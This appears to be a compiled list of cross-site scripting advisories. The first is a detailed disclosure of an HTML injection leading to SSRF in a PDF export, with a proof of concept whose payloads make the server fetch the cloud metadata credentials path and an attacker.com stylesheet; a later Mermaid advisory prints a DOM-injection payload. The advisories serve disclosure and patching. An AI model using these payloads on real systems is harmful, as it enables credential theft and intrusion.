XSS
Monthly
## Summary `PDFService._markdown_to_html()` constructs an HTML document by interpolating user-controlled values - specifically `title` (sourced from `research.title` or `research.query`) and `metadata` key-value pairs - directly into an f-string without any HTML escaping. An authenticated attacker can craft a research query containing HTML special characters to inject arbitrary HTML tags into the document processed by WeasyPrint during PDF export. This injection can be chained to trigger a Server-Side Request Forgery (SSRF), bypassing the application's existing SSRF defenses in `ssrf_validator.py`. --- ## Details **Vulnerable code:** `src/local_deep_research/web/services/pdf_service.py`, lines 171-176 ```python # pdf_service.py:171-176 if title: html_parts.append(f"<title>{title}</title>") # ← title is not escaped if metadata: for key, value in metadata.items(): html_parts.append(f'<meta name="{key}" content="{value}">') # ← key/value are not escaped ``` **Data flow trace:** ``` User input: research.query │ ▼ research_routes.py:1321 pdf_title = research.title or research.query │ ▼ research_routes.py:1325-1326 export_report_to_memory(report_content, format, title=pdf_title) │ ▼ pdf_service.py:107 PDFService.markdown_to_pdf(markdown_content, title=pdf_title) │ ▼ pdf_service.py:137 _markdown_to_html(markdown_content, title, metadata) │ ▼ pdf_service.py:172 f"<title>{title}</title>" ← injection point, no escaping │ ▼ pdf_service.py:112 HTML(string=html_content) ← WeasyPrint renders the injected HTML ``` `research.query` is a string submitted by the user via `POST /api/start_research`, stored as-is in the database, and retrieved without any sanitization. When the user triggers `POST /api/v1/research/<research_id>/export/pdf`, this value is embedded unescaped into the HTML document processed by WeasyPrint. **Injection point 1: `<title>` tag breakout** ``` Input: </title><img src="http://169.254.169.254/latest/meta-data/" /> Rendered: <title></title><img src="http://169.254.169.254/latest/meta-data/" /></title> ``` When WeasyPrint encounters the injected `<img>` tag, it issues an HTTP GET request to the value of `src` by default. **Injection point 2: `<meta>` attribute breakout** ``` Input: " /><link rel="stylesheet" href="http://attacker.com/evil.css Rendered: <meta name="..." content="" /><link rel="stylesheet" href="http://attacker.com/evil.css"> ``` WeasyPrint will fetch and apply the external stylesheet, which also constitutes SSRF. --- ## Proof of Concept **Step 1: Log in and submit a research query containing the injection payload** ```http POST /api/start_research HTTP/1.1 Host: localhost:5000 Content-Type: application/json Cookie: session=<valid_session> { "query": "</title><img src=\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\" onerror=\"x\"/>", "mode": "quick", "model_provider": "OLLAMA", "model": "llama3" } ``` The response returns a `research_id`, e.g. `"aaaa-bbbb-cccc-dddd"`. **Step 2: After the research completes, trigger PDF export** ```http POST /api/v1/research/aaaa-bbbb-cccc-dddd/export/pdf HTTP/1.1 Host: localhost:5000 Cookie: session=<valid_session> X-CSRFToken: <csrf_token> ``` **Step 3: Intermediate HTML constructed server-side** ```html <!DOCTYPE html><html><head> <meta charset="utf-8"> <title></title><img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" onerror="x"/></title> </head><body> ...report content... </body></html> ``` **Step 4: WeasyPrint issues an outbound HTTP request to the injected URL** Observed in network monitoring (e.g. `tcpdump`) or the target internal service logs: ``` GET /latest/meta-data/iam/security-credentials/ HTTP/1.1 Host: 169.254.169.254 User-Agent: WeasyPrint/... ``` **Lightweight verification (no SSRF environment required):** Set the query to: ``` </title><title>INJECTED ``` The resulting HTML will contain two `<title>` tags and the PDF document metadata title will read `INJECTED`, confirming successful injection. --- ## Impact ### 1. Chained SSRF (High Severity) By injecting `<img src>`, `<link href>`, or `<style>@import url()` tags pointing to internal addresses, WeasyPrint will issue HTTP requests on behalf of the server during PDF generation. This allows access to: - **Cloud metadata services** (`169.254.169.254`) on AWS, GCP, or Azure - enabling theft of IAM credentials and instance identity documents. - **Internal network services** (`192.168.x.x`, `10.x.x.x`) - enabling reconnaissance and interaction with internal APIs not exposed to the internet. - **Localhost administrative interfaces** - if SSRF protections are only applied at the user-input validation layer. This is an effective bypass of the application's existing SSRF defenses in `ssrf_validator.py`, because WeasyPrint's outbound resource requests are never routed through that validator. ### 2. HTML Document Structure Corruption Injected tags can prematurely close `<head>` and insert arbitrary content into `<body>`, causing WeasyPrint to render incorrectly or crash, resulting in a Denial of Service (DoS) condition for the export functionality. ### 3. CSS Injection (Medium Severity) By injecting `<link>` or `<style>` tags that load external stylesheets, an attacker can fully control the visual content of the generated PDF, enabling report content forgery or spoofing. ### 4. Affected Scope - All PDF export operations are affected. - The vulnerability is reachable by any authenticated user - no elevated privileges required. - Because each user operates against their own encrypted database, cross-user exploitation is not possible. However, on any shared or multi-tenant deployment, every authenticated user can independently trigger this vulnerability. --- ## Remediation Apply `html.escape()` to all user-controlled values before embedding them in the HTML template inside `_markdown_to_html`: ```python import html if title: html_parts.append(f"<title>{html.escape(title)}</title>") if metadata: for key, value in metadata.items(): html_parts.append( f'<meta name="{html.escape(str(key))}" content="{html.escape(str(value))}">' ) ``` Additionally, consider configuring WeasyPrint with a custom `url_fetcher` that blocks or restricts outbound HTTP requests to prevent SSRF via injected or legitimately-embedded external resources: ```python def safe_url_fetcher(url, timeout=10): from ssrf_validator import validate_url if not validate_url(url): raise ValueError(f"Blocked unsafe URL in PDF rendering: {url}") return weasyprint.default_url_fetcher(url, timeout=timeout) html_doc = HTML(string=html_content, url_fetcher=safe_url_fetcher) ``` --- *Report generated against commit `f3540fb3` - local-deep-research, branch `main`.* --- ## Maintainer note (2026-04-24) Thanks @Firebasky for the detailed report. The complete remediation spans two PRs, both merged to `main`: **#3082** (merged 2026-03-29, shipped in **v1.5.0+**) - closes the HTML-injection sinks: - `html.escape()` now wraps the `title` value in `<title>…</title>` - Same for metadata keys/values in `<meta name="…" content="…">` - Regression tests added in `tests/web/services/test_pdf_service.py` **#3613** (merged 2026-04-24, shipped in **v1.6.0**) - implements the `url_fetcher` recommendation from the Remediation section: - New `_safe_url_fetcher` in `pdf_service.py` delegates to `weasyprint.default_url_fetcher` only after `security.ssrf_validator.validate_url` accepts the URL - Blocks AWS metadata (169.254.169.254), RFC1918, loopback, and non-http(s) schemes - Covers the chained SSRF path through any URL reaching the rendered HTML - markdown body, citations, raw-HTML passthrough via Python-Markdown - Blocked URLs raise `UnsafePDFResourceURLError` (a `ValueError` subclass) so WeasyPrint skips the resource and the render continues - 8 regression tests, including an end-to-end render with `<img src="http://169.254.169.254/…">` embedded in the body **Advisory metadata:** CVSS `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N` (5.0 Moderate), CWEs **CWE-79** + **CWE-918**. **Patched in v1.6.0** - upgrade to v1.6.0 or later to receive both fixes.
Lack of validation of filter_target parameter on return_dynamic_filters.php (normally used as an AJAX in View Issues Page) allows an attacker to inject arbitrary HTML if the target is a TEXTAREA custom field. ### Impact Cross-site scripting (XSS) ### Patches - c885af13f0b8596714ffe11df757c09f35fbd8f4 ### Workarounds None ### Credits Thanks to siunam (Tang Cheuk Hei) for discovering and responsibly reporting the issue.
### Impact Under the default configuration, Mermaid state diagram's `classDef` allow DOM injection that escapes the SVG, although `<script>` tags are removed, preventing XSS. #### Proof-of-concept ``` stateDiagram-v2 classDef xss fill:red</style></svg><style>*{x:x;y:y;overflow:visible!important;contain:none!important;transform:none!important;filter:none!important;clip-path:none!important}</style><div style="x:x;y:y;color:red;font:5em/1 monospace;display:grid;place-items:center;z-index:2147483647;width:100vw;height:100vh;position:fixed;top:0;left:0;background:black">HACKED</div><svg><style>a:b [*] --> A:::xss ``` ### Patches - [v11.15.0](https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [37ff937f1da2e19f882fd1db01235db4d01f4056](https://github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056)) - [v10.9.6](https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3](https://github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3)) ### Workarounds If you can not update to a patched version, setting [`"securityLevel": "sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel) will prevent this, by rendering the mermaid diagram in a sandboxed `<iframe>`. ### Credits Thanks to @zsxsoft from @KeenSecurityLab for reporting this vulnerability.
Incorrect escaping of a saved filter's owner allows an attacker to inject arbitrary HTML on systems where $g_show_user_realname = ON. ### Impact Cross-site scripting (XSS). Note that By default, only users with *Manager* access level or above can save their filters publicly ### Patches - 44f490bcf20fd491c1b8f3fc9dd041d8c2a30010 ### Workarounds - Prevent display of users' real name (set `$g_ show_user_realname = OFF;` in configuration) - Restrict ability to store filters (set $`g_stored_query_create_threshold` / $`g_stored_query_create_shared_threshold` to `NOBODY` ### Credits Thanks to siunam (Tang Cheuk Hei) for discovering and responsibly reporting the issue.
Improper escaping of the redirection page (retrieved from the request's *Referer* header) allows an attacker to inject HTML. While this is generally not directly actionable as modern browsers will URL-encode special characters, on some specific server configurations this could poison the cache, leading to cross-site scripting. ### Impact Cross-site scripting (XSS). ### Patches - b1ebc57763f104eb5f541b7b4d1ce6948168abd9 ### Workarounds None ### Credits Thanks to siunam (Tang Cheuk Hei) for discovering and responsibly reporting the issue.
Given any pre-existing XSS / HTML injection vulnerability, an attacker can bypass the Content Security Policy's _script-src_ directive by uploading a crafted attachment to any issue that, when accessed via the _file_download.php_ link, will be downloaded with a valid JavaScript MIME type resulting in script execution. The uploaded payload must be sniffed as a valid JavaScript MIME type by PHP finfo (see file_create_finfo() API function). Non-JavaScript MIME types will not get imported in a `<script>` tag by the browser, due to response header X-Content-Type-Options being set to _nosniff_, which requires all imported JavaScript files to be a valid JavaScript MIME type. ### Impact Cross-site scripting ### Patches - 9e3bee2e7b909f4e3596985892b8bc8bee9e0bfe ### Workarounds None ### Credits Thanks to siunam (Tang Cheuk Hei) for discovering and responsibly reporting the issue.
Any authenticated user can inject arbitrary HTML via updating their account's font family. ### Impact Cross-site scripting. The injected payload will be reflected in every MantisBT page. Leveraging another vulnerability (CSP bypass, see [GHSA-9c3j-xm6v-j7j3](https://github.com/mantisbt/mantisbt/security/advisories/GHSA-9c3j-xm6v-j7j3)), the attacker could achieve account takeover. ### Patches - 9e8409cdd979eba86ef532756fc47c1d8112d22d ### Workarounds None ### Credits Thanks to siunam (Tang Cheuk Hei) for discovering and responsibly reporting the issue.
Improper escaping of a textarea custom field's contents in the Update Issue page (bug_update_page.php) allows an attacker to inject HTML and, if CSP settings permit, execute arbitrary JavaScript when the page is loaded. ### Impact Session theft leading to admin account takeover, full project data access. - Precondition: A textarea-type custom field must be configured for the project - Attacker: Authenticated user with bug report permission (low privilege) - Victim: Any user viewing the bug edit form, including administrators ### Patches - 5fec0f448b7a7d7d539a6adb6dccceac4e4e4ab7 ### Workarounds The default Content-Security Policy will block script execution. ### References - https://mantisbt.org/bugs/view.php?id=37003 - This is related to [CVE-2024-34081](https://github.com/advisories/GHSA-wgx7-jp56-65mq). ### Credits Thanks to the following security researchers for independently discovering and responsibly reporting the issue, and providing a patch to fix it. - Thanks to Nozomu Sasaki (Paul) (@morimori-dev) - Tristan Madani (@TristanInSec) from Talence Security
Stored HTML injection and cross-site scripting in MantisBT versions 2.28.1 and earlier allows a privileged user (manager or administrator) to inject HTML through a Project's name field, which is later rendered unescaped on the issue clone form (bug_report_page.php) when cloning issues across projects. The flaw is mitigated by MantisBT's default Content Security Policy, which blocks inline script execution, and no public exploit identified at time of analysis. The CVSS 4.0 score of 8.6 reflects high confidentiality, integrity, and availability impacts on the vulnerable component despite requiring high privileges.
Stored Cross-Site Scripting in WeGIA versions prior to 3.7.3 allows authenticated high-privilege users to inject malicious JavaScript into the Processo de Aceitação page that executes when any user accesses the vulnerable endpoint, enabling session hijacking and account takeover. The vulnerability is confined to high-privilege authenticated access (PR:H) with no user interaction required on the victim side, though scope is changed (S:C) indicating cross-context impact. No public exploit code or active exploitation has been identified.
Stored cross-site scripting (XSS) in WeGIA versions prior to 3.7.3 allows authenticated high-privilege users to inject malicious JavaScript into the Etapas de um Processo page, which executes when other users access the page, enabling session hijacking and account takeover. The vulnerability requires high-privilege authentication (PR:H) but affects all users who subsequently visit the injected page, with no public exploit identified at time of analysis.
Reflected cross-site scripting (XSS) in WeGIA versions before 3.7.0 allows unauthenticated remote attackers to inject arbitrary JavaScript via the id_processo parameter in lista_arquivos_etapa.php, enabling session hijacking, credential theft, or malicious actions in victim browsers. User interaction (clicking a crafted link) is required. The vulnerability is fixed in version 3.7.0.
WeGIA is a web manager for charitable institutions. In versions prior to 3.7.0, a Stored Cross-Site Scripting (XSS) flaw was identified at the following endpoint: funcionario/profile_funcionario.php?id_funcionario=2. By injecting a malicious payload into the 'Description' (Descrição) field and saving the profile, the script becomes persistently stored. The payload is subsequently executed whenever the profile page is accessed. This vulnerability is fixed in 3.7.0.
Improper Neutralization of CRLF Sequences ('CRLF Injection') vulnerability in ninenines cowlib allows SSE event splitting and injection via unvalidated field values. cow_sse:event/1 in cowlib guards the id and event fields against \n but not against bare \r, and the internal prefix_lines/2 function used for data and comment fields splits only on \n. Because the SSE specification requires decoders to treat \r\n, \r, and \n as equivalent line terminators, an attacker who controls any of these fields can inject additional SSE lines and forge a complete event with an arbitrary event type and data payload on the receiving end. In typical deployments where browser EventSource clients or other SSE consumers dispatch on event.type and render event.data, this enables event splitting, client-side logic manipulation, and stored-XSS-equivalent behaviour when event data is inserted into the DOM. This issue affects cowlib from 2.6.0.
Stored cross-site scripting (XSS) via CSS injection in Open edX Platform allows enrolled students to inject arbitrary CSS into discussion notification emails sent to other users by bypassing insufficient HTML sanitization in the clean_thread_html_body() function. The vulnerability affects all versions prior to the fix commit and enables email tracking through malicious stylesheets, content spoofing, and phishing attacks against recipients who view notification emails.
Stored cross-site scripting (XSS) in Sonatype Nexus Repository 3.6.0 through 3.91.x allows authenticated users with upload permissions to inject malicious JavaScript into repository content, which executes in the browsers of any user viewing the affected repository directory via the HTML index page. An attacker can perform unauthorized actions within a victim's session context, including potential data theft or privilege escalation depending on the victim's role. The vulnerability requires user interaction (clicking/viewing the malicious content) and prior repository upload access, limiting but not eliminating real-world risk in multi-tenant or open-source repository environments.
Taiga Front prior to version 6.9.1 contains a stored cross-site scripting (XSS) vulnerability that allows authenticated users with limited privileges to inject malicious scripts into confirmation messages and dialogs. When other users view these messages, the scripts execute in their browser context, potentially allowing attackers to steal session cookies, perform unauthorized actions, or redirect victims to malicious sites. The vulnerability requires user interaction (UI:R) but affects confidentiality with a CVSS score of 5.7.
Cross-site scripting via CSP nonce poisoning in Next.js App Router allows attackers to inject malicious scripts into cached HTML responses when applications process untrusted CSP request headers. Versions 13.4.0-15.5.15 and 16.0.0-16.2.4 are vulnerable; attackers can craft malformed nonce values that escape sanitization and execute arbitrary JavaScript for subsequent cache visitors. No public exploit code identified at time of analysis, but the attack requires no authentication and low user interaction (cache hit by victim), making it practically exploitable in shared hosting and CDN scenarios.
Cross-site scripting in Next.js beforeInteractive scripts allows remote unauthenticated attackers to execute arbitrary JavaScript in visitor browsers when applications pass untrusted content to beforeInteractive script features. The vulnerability arises from insufficient HTML escaping of serialized script content before embedding into the document, enabling attackers to break out of the script context. Affected versions include 13.0.0 through 15.5.15 and 16.0.0 through 16.2.4; patched versions 15.5.16 and 16.2.5 are available. No public exploit code or active exploitation has been identified at time of analysis, though the CVSS score of 6.1 reflects moderate risk with required user interaction.
Cross-site scripting (XSS) vulnerability in Wikimedia Scribunto 1.45.0 through 1.45.1 allows authenticated users to inject malicious scripts that may be executed in the context of other users' browsers, potentially compromising session security and enabling unauthorized actions on affected wiki installations. The vulnerability requires login credentials and elevated attack complexity but carries low availability impact; CVSS 2.3 reflects limited real-world threat when combined with the authentication requirement.
Stored cross-site scripting (XSS) in pgAdmin 4 before version 9.15 allows authenticated administrators to execute arbitrary JavaScript in the browsers of other pgAdmin users by crafting malicious PostgreSQL object names (databases, schemas, tables, columns) that are rendered unsafely via innerHTML in the Browser Tree and Explain Visualizer modules. The vulnerability requires administrator privileges and user interaction (navigation to or EXPLAIN execution over the malicious object), limiting real-world exploitation scope despite the network attack vector.
Reflected cross-site scripting (XSS) in Cradle eCommerce platform allows unauthenticated remote attackers to execute arbitrary JavaScript in users' browsers via crafted input to the /product/ endpoint. The vulnerability requires user interaction (clicking a malicious link) and affects the latest demo version. A vendor patch is available.
Reflected XSS in Cradle eCommerce platform allows unauthenticated remote attackers to execute arbitrary JavaScript in user browsers via unsanitized input reflected in the /collection/ endpoint. The vulnerability requires user interaction (clicking a malicious link) but affects the latest demo version with CVSS 5.1 (low-medium severity). No public exploit code or active exploitation has been identified at time of analysis, though a vendor patch is available.
Reflected XSS in ATutor's /install/install.php endpoint allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by crafting a malicious URL. Version 2.2.4 is confirmed vulnerable; the product is no longer actively maintained and vendor response to disclosure was unsuccessful, leaving no official patch available.
Reflected XSS in ATutor's /install/upgrade.php endpoint allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser via a specially crafted URL. The vulnerability affects at least version 2.2.4 and potentially other versions; the product is no longer actively maintained and vendors did not respond with details about the full vulnerable version range. While CVSS 5.1 indicates low severity, the attack requires user interaction (clicking a malicious link) and has limited scope impact.
Cross-site scripting (XSS) in Devs Palace ERP Online version 4.0.0 and earlier allows authenticated high-privilege users to inject malicious scripts via the /accounts/chart-save endpoint. The vulnerability requires user interaction (UI:P) to trigger and results in limited integrity impact. Publicly available exploit code exists, though the CVSS 4.0 score of 1.9 reflects low severity due to the high privilege requirement (PR:H) and user interaction dependency.
Cross-site scripting (XSS) in Devs Palace ERP Online up to version 4.0.0 allows high-privileged authenticated users to inject malicious scripts via the /inventory/sales_save endpoint with user interaction, resulting in integrity impact. The exploit code has been publicly released and the vendor has not responded to early disclosure attempts, leaving affected deployments without vendor-provided patches.
Reflected cross-site scripting (XSS) in Devs Palace ERP Online up to version 4.0.0 allows high-privileged authenticated users to inject malicious scripts via the /accounts/mr-save endpoint, enabling session hijacking or credential theft with user interaction. Exploit code is publicly available and the vendor has not responded to disclosure efforts, leaving affected deployments without an official patch.
Cross-site scripting (XSS) vulnerability in Devs Palace ERP Online versions up to 4.0.0 allows authenticated users with high privileges to inject malicious scripts via the /inventory/add_new_customer endpoint. The vulnerability requires user interaction (UI:P) and has publicly available exploit code, but real-world impact is significantly limited by the requirement for authenticated high-privilege access and user interaction, resulting in a CVSS score of only 1.9 despite network accessibility.
Reflected cross-site scripting (XSS) in docuForm v11.11c allows unauthenticated remote attackers to execute arbitrary JavaScript in a user's browser by crafting a malicious URL containing a payload injected into an unfiltered variable in the dfm-menu_coveragealerts.php component. Successful exploitation requires user interaction (clicking a malicious link) and can lead to session hijacking, credential theft, or malware delivery. CVSS 6.1 reflects moderate impact with low attack complexity; no public patch version has been identified.
Reflected cross-site scripting (XSS) in GmbH Mercury Managed Print Services docuForm v11.11c allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by injecting a malicious payload into an unfiltered variable in the dfm-menu_departments.php component. The vulnerability requires user interaction (clicking a crafted link) and affects confidentiality and integrity with limited scope. No public exploit code has been independently confirmed at this time, though the detailed nature of the component reference suggests proof-of-concept research exists.
Reflected cross-site scripting in Mercury docuForm v11.11c allows authenticated attackers to execute arbitrary JavaScript in victim browsers via crafted payloads to dfm-menu_alerts.php. Attack requires low complexity and user interaction (CVSS:3.1/AV:N/AC:L/PR:L/UI:R). Public proof-of-concept exists on GitHub (ZeroBreach-GmbH gist), but no CISA KEV listing indicates targeted or low-volume exploitation. EPSS data not available, but the authentication requirement and user interaction dependency reduce attack surface compared to stored XSS.
Reflected XSS in docuForm v11.11c acc-menu_billings.php component allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by injecting malicious payloads into unfiltered variables, requiring user interaction to click a crafted link. CVSS 6.1 reflects limited confidentiality and integrity impact with required user interaction, but successful exploitation can lead to session hijacking, credential theft, or account takeover depending on application context.
HireFlow v1.2 contains reflected cross-site scripting (XSS) vulnerabilities in the candidate detail interface that allow authenticated users to inject malicious scripts via the Resume or Feedback Comment fields when submitting data to POST /candidates/add or POST /feedback/add endpoints. An attacker with user-level access can craft a malicious request containing JavaScript payloads that execute in the browsers of other users viewing the affected pages, potentially compromising session tokens, stealing credentials, or performing actions on behalf of victims. The CVSS score of 5.4 reflects the requirement for user interaction and authenticated access, though the cross-site scope indicates broader application impact beyond the attacker's session.
Reflected XSS in docuForm Managed Print Services 11.11c enables authenticated attackers to execute malicious JavaScript in victim browsers via crafted links. The dfm-menu_orderopt.php component fails to sanitize input parameters, allowing session hijacking and account takeover when low-privilege users click attacker-controlled URLs. EPSS data unavailable; no CISA KEV listing indicates exploitation remains opportunistic rather than widespread. Public exploit code exists via GitHub Gist, lowering barrier to attack.
Reflected XSS in docuForm v11.11c allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by injecting malicious payloads into the dfm-menu_firmware.php component, requiring the victim to click a crafted link. CVSS 6.1 reflects moderate impact (confidentiality and integrity compromise) with required user interaction. Exploit code is publicly available via GitHub.
Reflected cross-site scripting in Mercury Managed Print Services docuForm v11.11c allows authenticated attackers with low privileges to execute arbitrary JavaScript in victim browsers via the acc-menu_pricess.php component. Public proof-of-concept exploit code exists on GitHub (ZeroBreach-GmbH). EPSS data not available, not listed in CISA KEV. Attack requires user interaction (phishing/social engineering to click malicious link), limiting automated exploitation but enabling credential theft and session hijacking for authenticated users.
docuFORM Managed Print Service Client 11.11c is vulnerable to a reflected cross site scripting attack via the login page of the application.
Reflected cross-site scripting (XSS) in GmbH Mercury docuForm v11.11c allows remote attackers to execute arbitrary JavaScript in a victim's browser by injecting malicious payloads into an unfiltered variable in the dfm-menu_maintenance.php component. The vulnerability requires user interaction (clicking a crafted link) but affects all site visitors, making it suitable for credential theft, session hijacking, or malware delivery. No public active exploitation has been confirmed at time of analysis.
Reflected XSS in docuForm v11.11c allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by injecting malicious payloads into the acc-menu_papers.php component. The vulnerability requires user interaction (clicking a crafted link) and has limited scope (session-based impact), with a CVSS score of 6.1. No public exploit code availability or CISA KEV listing confirmed at time of analysis, though a reference repository exists.
Reflected cross-site scripting in Mercury docuForm (Managed Print Services) v11.11c enables authenticated attackers to execute arbitrary JavaScript in victim browsers when users click malicious links. The vulnerability exists in dfm-menu_markeralerts.php due to unfiltered variable handling. CVSS 7.3 (High) reflects network-accessible attack requiring low-privilege authentication and user interaction. No public exploit confirmed, but proof-of-concept code published by ZeroBreach GmbH demonstrates feasibility. EPSS data unavailable; not in CISA KEV, indicating no confirmed widespread exploitation at time of analysis.
Cross Site Scripting vulnerability in iotgateway v.3.0.1 allows a remote attacker to execute arbitrary code via the Log Record Function
Stored cross-site scripting (XSS) in Devs Palace ERP Online up to version 4.0.0 allows high-privileged users to inject malicious scripts via the /inventory/purchase_save endpoint, affecting the confidentiality of other users' sessions. The vulnerability requires administrative-level privileges and user interaction (UI:R), resulting in a low CVSS score of 2.4, though publicly available exploit code exists and the vendor has not responded to disclosure attempts.
WordPress Picture Gallery 1.4.2 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the Edit Content URL field in the Access. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
Advanced Guestbook 2.4.4 contains a persistent cross-site scripting vulnerability in the smilies administration interface that allows authenticated attackers to inject malicious scripts by. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
WordPress GetPaid Plugin 2.4.6 contains an HTML injection vulnerability that allows authenticated attackers to inject arbitrary HTML code by exploiting the Help Text field in payment forms. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
Projectsend r1295 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting crafted input in the 'name' parameter of. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
Exponent CMS 2.6 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the Title and Text Block parameters in the text editing. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
Filterable Portfolio Gallery 1.0 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript by entering payloads in the title field. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
WordPress Plugin WP Symposium Pro 2021.10 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by exploiting insufficient sanitization. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
Contact Form to Email 1.3.24 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by creating forms with script tags in the form name. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
CMDBuild 3.3.2 contains multiple stored cross-site scripting vulnerabilities that allow authenticated attackers to inject arbitrary web script or HTML via crafted input in card creation and file. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
Ultimate Product Catalog 5.8.2 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the price parameter. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
Slider by Soliloquy 2.6.2 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the title parameter. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
AccessPress Social Icons 1.8.2 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by entering JavaScript payloads into the 'icon. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
Rocket LMS 1.1 contains a persistent cross-site scripting vulnerability in the support ticket module that allows authenticated users to inject malicious script code through the title parameter. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
WordPress Plugin AAWP 3.16 contains a reflected cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by manipulating the tab parameter. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the backend/mailingLog/manage module. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the auctions/manage module. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the tickets/manage module. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the news/manage module. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the posts/manage module. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the auctions/myAuctions/status/loose module. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the auctions/myAuctions/status/active module. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the orders/myOrders module. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
WordPress Plugin IP2Location Country Blocker 2.26.7 contains a stored cross-site scripting vulnerability that allows authenticated users to inject arbitrary JavaScript code through the Frontend. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
WordPress International Sms For Contact Form 7 Integration version 1.2 contains a reflected cross-site scripting vulnerability in the page parameter of the admin settings interface. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
WordPress Contact Form Builder 1.6.1 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by exploiting the form_id parameter. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
WordPress Plugin Jetpack 9.1 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating the post_id parameter. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
Drupal avatar_uploader 7.x-1.0-beta8 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating the file parameter. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
WordPress Plugin Videos sync PDF 1.7.4 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by exploiting unsanitized nom, pdf, mp4,. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
